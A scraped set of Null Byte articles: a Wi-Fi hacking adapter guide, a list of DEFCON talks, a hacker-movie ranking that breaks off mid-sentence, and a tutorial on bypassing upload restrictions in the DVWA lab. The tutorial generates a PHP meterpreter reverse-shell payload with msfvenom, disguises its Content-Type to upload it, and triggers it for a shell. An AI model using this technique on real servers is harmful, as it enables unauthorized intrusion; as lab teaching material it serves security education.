Amazon)If you're looking for a somewhat more compact wireless adapter that can be plugged in via USB, the Alfa AWUS036NEH is a powerful b/g/n adapter that's slim and doesn't require a USB cable to use.The AWUS036NEH, relatively compact with extreme range.Image by SADMIN/Null ByteThe Panda PAU05 2.4 GHz($13.99 on Amazon)Sometimes you need a stealthier option that's still powerful enough to pwn networks without making a big fuss about plugging in large, suspicious network adapters. Consider the g/n PAU05, affectionately nicknamed "El Stubbo" and a personal favorite both for its low profile and its aggressive performance in the short and medium range. Consider this if you need to gather network data without including everything within several blocks.A note on the Panda from one of our readers:The Panda PAUO5 on Amazon won't do packet injection. It seems they now ship with an unsupported chipset (RT5372), so make sure yours has the correct chipset!The PAU05, a super low-profile option that is one of my favorites.Image by SADMIN/Null ByteAdapters That Use the Atheros AR9271 ChipsetThe Alfa AWUS036NHA 2.4 GHz($37.69 on Amazon)The Alfa AWUS036NHA is my current long-range network adapter and the standard by which I judge other long-range adapters. For a long-range application, thispaired with a ridiculously big adapter($9.99) is a stable, fast, and well-supported b/g/n wireless network adapter.The AWUS036NHA, featuring great long-range performance.Image by SADMIN/Null ByteThe TP-LINK TL-WN722N 2.4 GHz($14.99 on Amazon)A favorite for newbies and experienced hackers alike, this compact b/g/n is among the cheapest but boasts surprisingly impressive performance. That being said,only v1 of this adapter will work with Kali Linux. The v2 version of this adapter is a different chipset, so make sure you check to see which yours is!WARNING: Only version ONE of this adapter will work with Kali.Image by SADMIN/Null ByteAdapters That Use the Ralink RT5370N ChipsetThe Detroit DIY Electronics Wifi Antenna For Raspberry Pi($11.99 on Amazon)While I haven't tested this IEEE 802.11n compatible adapter personally, the chipset is supported in Kali and it supports monitor mode. For an extremely compact adapter with an external antenna mount for swapping different types of antennas, the Detroit DIY Electronics Wifi Antenna For Raspberry Pi is a good starter option.Compact option from Detroit Electronics.Image viaDetroit ElectronicsAdapters That Use the Realtek RTL8812AU Chipset (New)The Alfa AWUS036ACH 802.11ac AC1200 Wide-Range USB 3.0 Wireless Adapter with External Antenna($59.99 on Amazon)Newly supported in 2017, the Alfa AWUS036ACH is a beast, with dual antennas and 2.4 GHz 300 Mbps/5 GHz 867 Mbps – 802.11ac and a, b, g, n compatibility. This is the newest offering I've found that's compatible with Kali, so if you're looking for the fastest and longest range, this would be the adapter to start with.To use this, you may need to first run the following.apt updateapt install realtek-rtl88xxau-dkmsThis will install the needed drivers, and you should be good to go.The Alfa AWUS036ACH, ready to hack on 802.11ac.Image viaAlfa WebsiteOther OptionsDuring my research, I also came across the following adapters with supported chipsets, but only anecdotal evidence of packet injection and monitor mode. If you're feeling adventurous, you can pick up one of the following supported adapters mention in the comments how it works for you.TheWiFi Module 4($27.95) by Hard Kernel uses the supported Ralink RT5572 chipset, which adds 5 GHz capabilities, and also works in 2.4 GHz.An ultra-compact option is also theWiFi Module 0($7.95), also by Hard Kernel, based on Ralink RT5370N chipset.Some of the top wireless network adapters for hacking.Image by SADMIN/Null ByteThat completes my roundup of wireless network adapters for hacking in 2019. Got a favorite I didn't list? Leave a comment and link us to it.Don't Miss:How to Select a Field-Tested Kali Linux Compatible Wireless AdapterFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by SADMIN/Null ByteRelatedHow to Hack Wi-Fi:Choosing a Wireless Adapter for HackingHow to Hack Wi-Fi:Get Anyone's Wi-Fi Password Without Cracking Using WifiphisherHow To:Check if Your Wireless Network Adapter Supports Monitor Mode & Packet InjectionHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsHow To:Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi AdapterHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyHow To:Spy on Network Relationships with Airgraph-NgHow To:Hack Wi-Fi Networks with BettercapHow To:Automate Wi-Fi Hacking with Wifite2How To:Extend a (Hacked)Router's Range with a Wireless Adapter.How to Hack Wi-Fi:Cracking WPA2-PSK Passwords Using Aircrack-NgHow To:Hunt Down Wi-Fi Devices with a Directional AntennaHow To:Pick an Antenna for Wi-Fi HackingHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow to Hack Wi-Fi:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow to Hack Wi-Fi:Cracking WEP Passwords with Aircrack-NgHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords with CowpattyNews:The Best Black Friday 2019 Deals for iPhone & Android ChargersHow to Hack Wi-Fi:Hunting Down & Cracking WEP NetworksHow To:Select a Field-Tested Kali Linux Compatible Wireless AdapterBuyer's Guide:Top 20 Hacker Holiday Gifts for Christmas 2017How to Hack Wi-Fi:Creating an Invisible Rogue Access Point to Siphon Off Data UndetectedHow To:Hack WiFi Using a WPS Pixie Dust AttackHow To:Hack Wi-Fi & Networks More Easily with Lazy ScriptHow To:Use Kismet to Watch Wi-Fi User Activity Through WallsHow To:Intercept Images from a Security Camera Using WiresharkHow To:Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using AirgeddonHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow To:Crack WPA & WPA2 Wi-Fi Passwords with PyritHacking Android:How to Create a Lab for Android Penetration TestingHacking Gear:10 Essential Gadgets Every Hacker Should TryHow To:Crack Wi-Fi Passwordsβ€”For Beginners!How To:Find Saved WiFi Passwords in WindowsHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Hack Your Neighbor with a Post-It Note, Part 1 (Performing Recon)News:Secure Your Wireless Network from Pillage and Plunder in 8 Easy Steps
The 15 Most Popular Talks from DEFCON's Hacking Conferences Β« Null Byte :: WonderHowTo
Every summer for the last 26 years, hoards of hackers have descended on the Las Vegas Strip for DEFCON, the biggest hacker conference in the US. There's a wealth of talks every season (DEFCON 27 has at least 95 scheduled), and there have been some essential topics to learn from in past discussions. We've dug through the last ten years and found the 15 most popular talks you should watch.A couple of months after one of its conferences ends, DEFCON diligently posts videos of speakers' talks on YouTube, so you never have to worry about missing one. It's not uncommon for people that physically attend DEFCON to never go to a speech, and they can also rely on watching them on YouTube afterward.DEFCON is all about socializing and networking, which makes it easy to wonder where all the time for talks went after leaving. But that doesn't mean that the discussions aren't worth watching. They can be profound, and it's not uncommon for zero-days to drop. Presentations can be anything from in-depth how-to guides and 101 classes to funny hacker storytime sessions.Don't Miss:Attend Defcon Without Looking Like a Noob or Spending a FortuneWhether you're new to DEFCON or you're a veteran attendee, make sure to check out the following 15 talks. They're sessions over the years that every hacker or aspiring hacker should view. For the list, we've used view counts as the scoring metric, in order from lowest to highest. View counts come from all versions on YouTube, duplicate content included. The views counts of the videos embedded here do not represent all the view counts, so keep that in mind.1. Cracking 400,000 Passwords (273,000 Views)To start, we have a presentation about cracking massive password lists, an excellent primer oncracking passwordsfrom large database breaches, from DEFCON 17. (The talks alternative title is "How to Explain to Your Roommate Why the Power Bill Is a High.") In particular, the talk covers the old phpbb.com breach which contained 340,000 username and password combinations.The speaker, Matt Weir, then a doctorate student from Florida State University, discusses his experience in cracking that list and his troubles with everything from dealing with large password lists to salted lists. Then, he releases all the tools he used in the process. Watching this video is crazy and humbling now because of the massive computing power that we have to throw at such problems thanks in part to the cryptocurrency boom and GPU mining. With modern technology, it isn't difficult to find or make a GPU password-cracking rig that could burn through that same list in hours.Be sure to watch the video to see the basics of password cracking and to appreciate just how far we've come in ten short years. Be sure to pause the video when passwords are being churned out, as the results can be hilarious.2. The Art of Trolling (427,000 Views)If you've ever wanted to master the art of trolling, then this talk from DEFCON 19 is for you. Matt 'openfly' Joyce, best known as "the guy that has been banned from just about every server and forum known to the internet," dives into the history and misconceptions of what trolling is and how it has such a close relationship with hacking and hacking culture.Matt looks at the history of trolling in society and the techniques that are used to maximum effect. Along the way, he tells stories about various projects and successful trolls, which all provide amazing lessons insocial engineeringand the practical application of trolling and disinformation. It's truly a timeless talk, as you can always draw direct relationships to the current times with examples like Russian troll bots and radical political entities.If you are interested in social engineering and want to understand better the methods trolls use to combat them more effectively, or if you wish to hone your trolling skills, watch it. Then, practice your trolling skills in the massive training ground that is the comments section of the video.3. DIY Non-Destructive-Entry (454,000 Views)This is a truly fantastic presentation from DEFCON 19 covering the basics oflock-pickingand various other methods of opening or unlocking things that weren't intended to be unlocked. Schuyler Towne explains how to open virtually everything you would want into β€” cars, safes, briefcases, and more β€” all with commonly available objects.It's a must-watch because someday if you lock yourself out or are illegally detained, you may need to know this sort of thing and become your own personal James Bond. If you're a physical penetration tester, I would suggest watching this several times and taking notes. It's amazing how some common trash can defeat costly locks and safes.4. Don't Fuck It Up! (462,000)Zoz, a robotics engineers, had a talk at DEFCON 22 about civil disobedience and not getting caught. It's really a rant more than anything, but it's an entertaining rant. The presentation uses some spectacular screw-ups on the part of the surveillance state to analyze what their capabilities are and maximize your chances of maintaining your freedom and anonymity.It involves covering your tracks online and usingburner phonesas well as other ways to collaborate with people privately. If you have anything you wish to hide, then the video provides a great starting point. But be aware, at this point, that even watching the talk will probably get you on some kind of list.5. Knocking My Neighbor's Kid's Cruddy Drone Offline (469,239 Views)Now we've got an insanely entertaining talk from DEFCON 23 that anyone with an annoying neighbor can sympathize with. Plus, the speech by Michael Robinson came out whendroneswere first starting to become mainstream and has helped highlight their vulnerabilities. It serves as an excellent primer on various drone countermeasures, including GPS spoofing and targeted signal jamming. Life lesson: never annoy a hacker with lots of spare time.6. Stories from a Hacker Who Made It Inside the Government (472,000 Views)Hackers and the government are not exactly known for agreeing with each other. There can be quite a lot of misunderstanding and animosity between the two groups. The video from DEFCON 21 doesn't exactly change any of that, but it's a fun hacker storytime that also serves to build a bridge of understanding between these two groups. It's a must-watch for anyone in the hacker community considering a job with any of the government agencies.In his talk, Peiter "Mudge" Zatko, who was a part of DARPA, discusses four stories, those being:Julian Assange's story about the US government's involvement in WikiLeaks' origins.How the Department of Defense (DoD) unintentionally caused Anonymous to target their systems.How the defense industrial base's poor security works financially in its favor.Cases where the government missed opportunities for positive outreach and understanding with the hacker community.While these stories have been in the news, you likely haven't heard this angle on them or listened to the behind the scenes and decisions that went on.7. Forensic Fails - Shift + Delete Won't Help You Here (499,000 Views)Another hacker storytime-style talk, the video below highlights inept computer users and their attempts at "anti-forensics." Eric Robi, a forensic examiner, and Michael Perklin, a cyber investigator, are both your stereotypical super awkward turbo-nerds, but they know what they're talking about.In their DEFCON 21 talk, they provide some powerful life lessons on how and when you should delete data and how deleting data can come back to bite you. Innocent people have nearly gone to jail for removing the wrong bit of data, so be sure to watch the talk so that it doesn't happen to you.8. The Secret Life of SIM Cards (522,000 Views)You may not realize that they ever-presentSIM cardis a tiny CPU itself. Small Java programs can even run on it separately from and without knowledge of the phone's operating system, which is precisely what the DEFCON 21 talk below covers.Karl Koscher and Eric Butler use their experience building SIM card apps for the Toorcamp GSM Network, and they explain what those applications are and how they can be used, including the Java card standard. It's a more profound technical talk, so consider yourself warned. If you're into phone hacking, it's worth a watch. (If you're watching and wondering, they renamed it from Isis to Softcard for obvious reasons.9. Stealing Profits from Spammers (743,000 Views)Have you ever wondered how spammers make their money? Well, you don't have to be a Nigerian prince to find out. Grant Jordan wondered the same thing and embarked on a four-month-long odyssey of attempting to make money off spammers.In the DEFCON 17 video, alternatively titled "How I Learned to Stop Worrying and Love the Spam," he talks about how he tried and failed along the way until he eventually developed a program that was able to target stock trading spammers by reading thousands of emails, eventually out-trading them. It's more of a thought exercise than a real attempt at making money, but it gets some gears turning in your head about other ways to hack the hackers.10. My Botnet Bought Millions in Cars & Defeated Russian Hackers (749,000 Views)Again, we have another talk which is more story than an explicit how-to guide. Nevertheless, it's worth watching if you're at all interested in botting, web scraping, or otherwise manipulating products sold online.In the DEFCON 21 talk, Michael Schrenk goes over his experience building a used car buying bot for a car dealership and the evolution of the bot over time as other competitors, namely Russian hackers, attempted to do the same thing. It provides some pretty surprising insights into bot optimization and working with websites as fast as possible, as well as tips on staying below the radar, so others don't catch on to what you're doing.11. Elevator Hacking: From the Pit to the Penthouse (773,000 Views)We've got another fantastic video for physical pen-testers, and this is somethingwe've covered before in-depth on Null Byte. Elevators are often integrated as part of the access control systems for buildings, yet due to fire safety concerns, there has to be a manual override for firefighters. Overrides can also be easily exploited by anyone with a little bit of lock-picking skill or a unique key. Be sure to watch the DEFCON 22 presentation by the CORE Group and Deviant Ollam for an in-depth history of elevators and everything you could want to know about hacking them.Don't Miss:How to Bypass Access Control Systems to Visit Locked Floors & Restricted Levels in Any BuildingExtended video version available, which adds about an hour.12. Steal Everything, Kill Everyone, Cause Total Financial Ruin! (836,000 Views)Now for one of, if not the best, social engineering talk that appeared at the hacker conference. The DEFCON 19 talk serves as a powerful reminder of just how much chaos can be sowed by a single person with a nefarious purpose. What sets the conversation apart from the others is the fact that the speaker spends just as much time covering the counters and the defense for everything that he's talking about, which makes it a valuable presentation for anyone organizing physical security or training employees about social engineering tactics.Note: Video is mislabeled on DEFCON's YouTube channel. (Alternative video.)13. Hacking MMORPGs for Fun & Mostly Profit (837,000 Views)It's not hard to see why the DEFCON 19 talk below is popular since there's a lot of overlap between hackers and gamers. There are also a lot of misunderstandings, particularly in the gaming world, where the term hacker gets thrown around every time someone loses. The talk does a lot to clear up what is and isn't possible in MMORPG hacking and just how it's done.A lot of people get very annoyed with one of the speakers (Josh Phillips), but don't let it dissuade you from watching. The discussion serves as a great base of knowledge if you're interested in hacking video games yourself, as it covers software bugs such as item and money duplication, as well as botting. With gaming being a multibillion-dollar industry, there's a lot of money up for grabs for hackers and developers alike.14. Hack All the Things: 20 Devices in 45 Minutes (998,000 Views)With the evolution ofInternet of Thingsdevices, the hackable attack surface of virtually every home and business has grown exponentially. The growth of IoT coincided with startup culture, and they combined to create products where security was an afterthought β€” if a thought it all. Naturally, this led to a festival of hacking carried out by The Exploiteers team in which they hacked everything, including TVs, baby monitors, media streamers, network cameras, home automation devices, and VoIP gateways β€” 20 devices in all.Thanks to the talk, as well as broader security concerns by the public in general, IoT devices have made steps towards being more secure in the following years. However, they still leave something to be desired. Be sure to watch it to find out about the most common mistakes developers make and how you can exploit them yourself.15. That Awesome Time I Was Sued for Two Billion Dollars (1,319,000 Views)Finally, we have the most popular DEFCON talk of all time. At least, according to YouTube. It's another legendary hacker storytime talk about Jason Scott, filmmaker and archivist. He's founder and operator of textfiles.com, a website which archives the early internet, and it got him sued for two billion dollars! So be sure to watch this hilarious recounting from DEFCON 17 of getting sued, and maybe you'll walk away a little wiser.Wrapping UpOverall, DEFCON is an excellent conference with the long and storied history of producing amazing talks. We've only looked at the 15 most popular talks today, but they are plenty more worth watching on theDEFCON's YouTube channel.It's also worth looking into talks from the various sub-conferences, aka villages, that go on. Once you plow through all of those, it might be worth looking deep on the internet for talks from the early years of DEFCON. They can be quite challenging to find due to how small it was at the time, and since it was 30 years ago before YouTube was ever a thing.There will likely be more great talks to come, and some may be right around the corner. DEFCON 27 runs from August 8–11, 2018. Future DEFCONs run once ever summer, so there will be plenty of presentations to come.Disagree with our picks? Did we miss your favorite? Let us know in the comments below! And thanks for reading. If you have any questions, you can ask here or on Twitter@The_Hoid.Don't Miss:How to Build a Software-Based Wi-Fi Jammer with AirgeddonWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaDEFCONRelatedHow To:Attend Defcon Without Looking Like a Noob or Spending a FortuneNews:Unencrypted Air Traffic Communications Allow Hackers to Track & Possibly Redirect FlightsHow To:Save Money on Groceries! Scam… Er… Scan Your Own Stuff at Self-CheckoutNews:Facebook's F8 Badge Shows Developers It's Serious About Augmented RealityHow To:Wash your keyboardNews:Add Some Fun to Your Zoom Video Calls by Changing Your Virtual BackgroundBrief Reality:AR Hits the Conference CircuitNews:Anyone Else Likes TDoS?How To:Pick multi-disk combination locksHow To:Break into Almost Any Gun Safe with Straws, Paper Clips, Coat Hangers, and Even Children!How To:Play Talking Tom Hero Dash on Your iPhone Right NowSubterfuge:MITM Automated Suite That Looks Just Lame.News:This 1974 Gas-Guzzling Beetle Is Now an Eco-Friendly Electric "Voltswagon"How To:Hack web browsers with BeEFNews:AWE AR & VR Conference Still On (For Now), with Special Safety Measures in Place, Here's What You Need to KnowNews:Facebook Cancels Annual F8 Developer Conference Due to Coronavirus ConcernsHow To:Use This Trick to Eavesdrop on Callers with Google's Call Screen FeatureNews:News Clips - June 8News:Do PC Games Need a Press Conference?News:Russia threatens to strike NATO missile defense sites7/16- Fri Pick:MGMT @The Greek TheatreGames That Act Like Films:Are They Really 'Bastard Half-Children'?News:QRCA 2011 Conference - Las VegasNews:Ron Paul Has Been Quietly Piling Up Delegates – For a Brokered Convention?News:iMovie on iPhone, coming in JuneNews:Acclaimed Lock Picker Explains the Art of Competitive LocksportTED TALKS:"How We Wrecked the Ocean"News:FarmVille Harvests the World via iPhone?IndieCade:An Indie Gaming Conference and Festival All in OneNews:Life Simulates Video Games in FPS Russia – And Not in a Bad WayNews:10 Uses for the Front-Facing iPhone CameraNews:What's all the fuss about World of Warcraft?News:RINGO STAR talks about his drumming styleNews:Enter the VoidNews:The Designer Talk Show
How to Bypass File Upload Restrictions Using Burp Suite Β« Null Byte :: WonderHowTo
When attempting to gain access to a server, there may come a point when you need to get around file upload restrictions to upload something. If we can find a way to get around the restrictions, then we can upload anything we want to the server, effectively compromising it. That is what we'll be doing here today, so let's get started!Setup & RestrictionsWe'll be demonstrating this on the Damn Vulnerable Web App (DVWA). We will be using the "medium" security setting, as this tactic will not work for the "high" security setting. The main upload restrictions we'll be up against is file type. We're only supposed to be uploading JPEGs. The file size will not be an issue here as the payloads we'll be using do not exceed the limit.Step 1: Generating a PayloadIf we're going to be bypassing file upload restrictions, we should have a file to upload! In this case, we'll be using a reverse TCP meterpreter stager formatted in PHP. We'll generate this payload with this command...msfvenom -p php/meterpreter/reverse_tcp > payload.phpWe give the-pflag to indicate what payload we wish to use, and we write the output to a file named "payload.php". Now that we have our payload, we can begin the process of uploading it.Step 2: Start Burp Suite & Configure the ProxyBurp Suite has many useful tools, but today we'll be using the proxy tool. This allows us to intercept information that we're sending to the server and change some values associated with it. This is what will allow us to bypass the restrictions. Once you start Burp Suite, you should be greeted by a screen like this:We'll be using the proxy tool, so I have it selected already.A Quick NoteIn the above image of the Burp Suite menu, we have intercept disabled. This will allow information to flow freely through the proxy instead of being intercepted by it. It is incredibly useful to keep intercept off for the time being, and to turn it back off as soon as we're done using it.Now that we've started Burp Suite, we have to configure the proxy from our browser. If you go to connection settings underAdvanced Settings, then you should be greeted with a menu like the one below. You'll need to manually enter the loop-back address as the HTTP proxy and set the port number to 8080. This is the default port number of the Burp Suite Proxy.Now that we've configured our proxy properly, we'll be able to intercept the information and manipulate it around the restrictions.Step 3: Bypass the RestrictionsNow that we've got our proxy ready to go, all we need to do is attempt to upload our file! But first, let's try to upload it without using the proxy.If we attempt to upload our file without tampering with the information, it won't upload. I know this is a little redundant, but it's a good way to demonstrate the restrictions in action. So, let's try and upload our file.We can see here that the restrictions are in fact working so we will need to use our proxy to get around them. We'll need to enable intercept in our proxy so we can read and change the information captured.Now we'll attempt to re-upload the file and work around the restrictions.After looking through the Burp Suite result, we found what we're after, the content type. Remember, we're only allowed to upload JPEGs, so we're going to have to change the value of "Content-Type". We'll change it to "image/jpeg" so we can disguise our file as an image.All we have to do is press "forward" at the top of the menu and disable intercept again. Now that we've changed the content type to a JPEG, it should be able to get past the restrictions without any issues.As we can see from the above result, it worked! We were able to get our file around the restrictions! Now we just have to establish a handler and run the payload.Step 4: Set Up the Payload HandlerSince we'll be receiving a connection, we'll have to set up a listener. This will simply handle the connection we're about to receive.Here we've set up a handler using a reverse TCP meterpreter payload, and we've set our LHOST to our IP address. You may notice that we've used a different payload for our listener than we did when we generated one. The reason for this is because the payload we generated was astager.What this means is that the payload we uploaded will establish a connection, and then a second payload will be executed, giving us the access we want. Now we just have to start the handler and execute our uploaded payload.Alright! Now we're listen for connections on port 4444. This is the default port for generated payloads so we mustlistenon that port as well.Step 5: Trigger the PayloadNow that we're listening for incoming connections we can trigger our payload and receive one. In order to do that we'll need to navigate to the directory on the server where our payload is being stored, and attempt to access it. We can do this by entering the following URL.Once we enter this URL we should receive our reverse shell.There we have it! We were able to successfully bypass the restrictions to upload our file and trigger it once it was uploaded, now we have the access we wanted!FeedbackIf you have any questions, by all means, ask them in the comments! I'm sure they'll be answered! Thank you for reading!-DefaltWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Leverage a Directory Traversal Vulnerability into Code ExecutionHow To:Use Burp & FoxyProxy to Easily Switch Between Proxy SettingsHow To:Generate a Clickjacking Attack with Burp Suite to Steal User ClicksHIOB:WebSite Hacking Series Part 2: Hacking WebSites Using The DotNetNuke VulnerabilityHack Like a Pro:How to Hack Web Apps, Part 4 (Hacking Form Authentication with Burp Suite)How To:Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrikeHow To:Hack Facebook & Gmail Accounts Owned by MacOS TargetsHow To:Beat LFI Restrictions with Advanced TechniquesHow To:Bypass Candy Crush Saga's Waiting Period to Get New Lives & Levels ImmediatelyHack Like a Pro:How to Crack Online Web Form Passwords with THC-Hydra & Burp SuiteHack Like a Pro:How to Hack Web Apps, Part 3 (Web-Based Authentication)How To:Get Around Vine's Time Restriction and Upload Videos Longer Than 6 SecondsHack Like a Pro:How to Hack Web Apps, Part 1 (Getting Started)How To:Hack SAML Single Sign-on with Burp SuiteHow To:Bypass File Upload Restrictions on Web Apps to Get a ShellHow To:Stream Netflix, Hulu, and Pandora from Anywhere in the World with Media HintHow To:Install Snapchat on a Nexus 7 or Any Other Android TabletHow To:The Easiest Way to Transfer Files to Others with Your Web BrowserHow To:Turn unlimited M4A, .AAC and .MP4 files into MP3sHow To:Correctly burp a babyHacking Windows 10:How to Hack uTorrent Clients & Backdoor the Operating SystemHow To:Bypass Android's File Type Restrictions on Bluetooth File SharingHow To:Use Google Translate as a ProxyHow To:Bypass Restrictions to Install Hearthstone on Any Android DeviceHow To:Download & Install the Null Byte SuiteAntivirus Bypass:Friendly Reminder to Never Upload Your Samples to VirusTotalHow To:Break into Router Gateways with PatatorHow To:Use MSFconsole's Generate Command to Obfuscate Payloads & Evade Antivirus DetectionHow To:Bypass Common Windows Restrictions, Activate God Mode, and MoreNews:How-To-Use Facebook To Host your blog/website Images And Get Unlimited BandwidthSocial Engineering, Part 2:Hacking a Friend's Facebook PasswordNews:Windows Live SkyDriveNews:The 5 Best iPhone/iPad Apps for Exporting and Importing Your PhotosHow To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitNews:Rivers!
Advice from a Real Hacker: The Top 10 Best Hacker Movies Β« Null Byte :: WonderHowTo
In recent years, Hollywood has taken a shine to hackers, with hackers appearing in almost every heist or mystery movie now. This can be both good and bad for our profession. As we know, whichever way Hollywood decides to depict our profession is how most people will perceive it.The good news is that not all of Hollywood's depictions of hackers are negative, despite the overwhelming perception by the masses that our profession is a malicious one.In trying to determine the ten best hacker movies, I tried to only use those films where people are actually entering into other peoples' or organizations' computers for good or ill. Very often, reviewers of this genre include any movie with computer "stuff" as a "hacker movie." In my definition of a hacker movie, someone must be using advanced skills to access someone else's computer, without their consent or knowledge, for good or ill.In addition, I evaluated the movies based upon plot, acting, directing and, most importantly, how they portrayed hackers. They got extra points if they portrayed the hackers as the "good guys," have female hackers in opposition to the male geek archetype, and even more points if the hacking represents something close to reality.#10. TakedownTakedown(also known asTrackdown) is a B-grade movieβ€”a fictionalized and sensationalized account of the tracking and capture of probably the most infamous U.S. hacker, Kevin Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and '90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.This movie has low production values, despite having some relatively well-known actors (Skeet Ulrich, Tom Berenger, and Amanda Peet, among others). Don't expect to learn much hacking from this movie, though, as nearly the entire 1 hour and 36 minutes is a story about tracking down Kevin Mitnick as the FBI and Shimomura searches for him across the states.#9. SwordfishInSwordfish, Hugh Jackman plays a retired, elite hacker who has been released from a long prison term and is now working in the oil fields and living in a trailer. He is approached by an organized crime figure played by John Travolta, and is forced to do one last hacking job against his will.Unfortunately, the hacking is forgettable and far from reality. Jackman's character is seen breaking into highly secure systems within seconds, while gyrating geometric objects appear on his screen. Very little depiction of the actual hard work that goes into hacking is seen, and they make it look like a computer game.The most memorable part of this movie is Halle Berry's topless scene. Although it has nothing to do with hacking, it does make this movie memorable.#8. The Italian JobAlthough the MINI Coopers are really the stars ofThe Italian Job(a remake ofthe 1969 filmof the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible. Could this hacker have been usingShodanto identify and assist in hacking these devices?Although not true to the detail, it does portray hacking with some realism. I really like the concept that ALL digital devices are susceptible to hacking, not just computer systems.#7. The Fifth EstateThe Fifth Estateis an unauthorized account of Julian Assange andWikiLeaks. Cumberbatch plays a believable Assange as a egotistical, idealist that is out to change the world. Few Americans know that Assange is a famous (or infamous) hacker in his native country of Australia. He broke into the Pentagon, Citibank, NASA, and Stanford University, among other facilities, before being caught.WikiLeaks was founded to provide a safe place for whistleblowers to make secret state information available to the world when that information reveals the ill deeds of powerful governments. They were responsible for the leaks regarding U.S. military abuses in Iraq and Afghanistan, as well as in other places.Although little hacking takes place in this movie, it is an important film for the hacking community as it depicts how hacking can potentially change the world history, as I'm sure it will.#6. Ghost in the ShellGhost in the Shellis a classic Japanese anime film that depicts a future (probably mid-21st century) where humans are part flesh and blood and part bionic. Many people have cyber brains that are part electronic and part grey matter. This cyber brain enhances their cognitive abilities and allows them to plug into larger networks. This is an intriguing concept that is likely to become reality in the very near future.The story is about a special operations task force that is part-police and part-military. The lead character is female officer whose body was destroyed as young girl and has been replaced by a beautiful bionic body. The hacking in this futuristic tale is the even more malicious variety of hacking, the hacking of the human mind.#5. SneakersInSneakers, Robert Redford and Ben Kingsley portray two young hackers whose lives take two different directions after their playful hacking leads to the arrest of Kingsley's character. They meet again some thirty years later when one (Kingsley) is working for the bad guys and the other (Redford) isn't sure who he's working for when he's forced to comply upon threat of his true identity being revealed.The plot revolves around a new encryption algorithm that would make electronic communication secure. The NSA plays the bad guys who want the encryption algorithm so that they can spy on everyone. The movie was ahead of its time in that respect.#4. Live Free or Die HardThe fourth installment in the Die Hard series,Live Free or Die Hard, depicts a scenario where a hacker played by Timothy Olyphant (ofJustifiedfame) takes down nearly the entire U.S. infrastructure in an attempt to transfer trillions of dollars from the Federal Reserve to his account.Please enable JavaScript to watch this video.As I believe this type of infrastructure hack is one of the most important issues in national security, it gets kudos from me. Watching Bruce Willis ride outside of a Harrier Jump Jet to take down the bad guys is simply laughable, though. Another notable moment in this movie is the portrayal by Justin Long as the good guy hacker employed by Willis' cop character to assist in stopping the bad guys. You probably remember him from the iconic "Mac vs. PC" ads.#3. WarGamesThis classic 1983 hacker moveWarGamesdepicts a young teenage bedroom hacker played by Matthew Broderick who almost starts World War III. By war-dialing, he is able to get unencumbered access to the Department of Defense's nuclear missile launch controls.The hacker is portrayed as a playful, rather than malicious, and knowledgeable teenager who inadvertently hacks into critical DoD systems.#2. The Girl with the Dragon TattooNoomi Rapace portraysThe Girl with with Dragon Tattoo(I prefer the original Swedish version tothe Hollywood version) superbly. She is a young woman, recently released from prison for a crime of passion in her youth. She has been traumatized by the corrections and probation system and is probably showing signs of mild autism. As a way of earning an income, she works as hacker for hire for a private investigator. This leads her into the path of Mikael, a middle-aged investigative writer who is being unfairly persecuted by a diabolical wealthy industrialist.Her hacking is critical to revealing the identity of the true evil-doer. Although the hacking is oversimplified, it is far more realistic than most films, even if she is using a Mac. She works from a command line terminal and there are scenes showing the Unix/Linux file structure.#1. HackersInHackers, Angelina Jolie and Johnny Lee Miller (they were married after the making of this movie) portray two youthful and hip hackers. Miller (now of the Sherlock Holmes TV spinoff,Elementary) portrays a hacker who got caught as a very young child (11) after crashing thousands of computers and has been sentenced to zero computer access until his 18th birthday.The hacking is relatively realistic, although a bit dated. The film was made in 1993, but the technology looks to be mid- to late-1980s. It gets points for portraying hackers as the good guys (thwarting the plans of the evil corporation) and as hip, rather than nerds.What do think? Did I miss any great hacking flicks?Want to start making money as a white hat 